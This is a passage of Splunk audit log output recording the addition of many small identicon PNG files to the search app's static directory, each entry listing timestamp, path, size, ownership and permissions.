modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.080, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/89.png", isdir=0, size=399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.077, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/889.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.073, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/888.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.069, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/887.png", isdir=0, size=291, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.065, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/886.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.060, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/885.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.056, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/884.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.052, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/883.png", isdir=0, size=273, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.048, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/882.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.044, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/881.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.040, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/880.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.034, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/88.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.028, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/879.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.024, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/878.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.020, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/877.png", isdir=0, size=320, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.016, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/876.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.011, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/875.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.007, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/874.png", isdir=0, size=377, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.003, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/873.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.998, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/872.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.994, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/871.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.991, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/870.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.985, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/87.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.982, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/869.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.977, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/868.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.972, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/867.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.968, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/866.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.963, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/865.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.959, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/864.png", isdir=0, size=337, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.953, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/863.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.949, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/862.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.945, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/861.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.941, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/860.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.935, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/86.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.931, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/859.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.927, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/858.png", isdir=0, size=304, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.921, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/857.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.915, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/856.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.911, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/855.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.908, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/854.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.904, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/853.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.900, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/852.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.896, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/851.png", isdir=0, size=405, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.892, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/850.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.888, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/85.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.884, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/849.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.880, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/848.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.876, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/847.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.872, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/846.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.868, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/845.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.864, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/844.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.858, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/843.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.855, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/842.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.851, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/841.png", isdir=0, size=312, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.847, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/840.png", isdir=0, size=321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.844, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/84.png", isdir=0, size=404, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.840, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/839.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.837, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/838.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.833, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/837.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.828, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/836.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.823, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/835.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.817, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/834.png", isdir=0, size=279, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.812, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/833.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.808, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/832.png", isdir=0, size=288, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.804, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/831.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.799, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/830.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.796, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/83.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.790, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/829.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.784, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/828.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.780, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/827.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.776, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/826.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.770, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/825.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.766, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/824.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.762, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/823.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.757, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/822.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.751, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/821.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.747, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/820.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.743, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/82.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.739, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/819.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.735, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/818.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.729, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/817.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.725, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/816.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.721, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/815.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.718, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/814.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.712, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/813.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.708, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/812.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.704, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/811.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.700, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/810.png", isdir=0, size=269, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.696, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/81.png", isdir=0, size=307, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.691, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/809.png", isdir=0, size=284, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.686, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/808.png", isdir=0, size=401, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.681, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/807.png", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.676, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/806.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.672, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/805.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.667, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/804.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.662, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/803.png", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.657, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/802.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.653, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/801.png", isdir=0, size=294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.648, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/800.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.639, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/80.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.633, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/8.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.630, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/799.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.626, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/798.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.622, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/797.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.617, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/796.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.613, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/795.png", isdir=0, size=292, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.608, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/794.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.604, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/793.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.599, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/792.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.593, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/791.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.588, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/790.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.585, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/79.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.579, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/789.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.573, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/788.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.569, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/787.png", isdir=0, size=316, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.565, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/786.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.561, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/785.png", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.557, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/784.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.553, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/783.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.550, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/782.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.546, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/781.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.542, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/780.png", isdir=0, size=373, 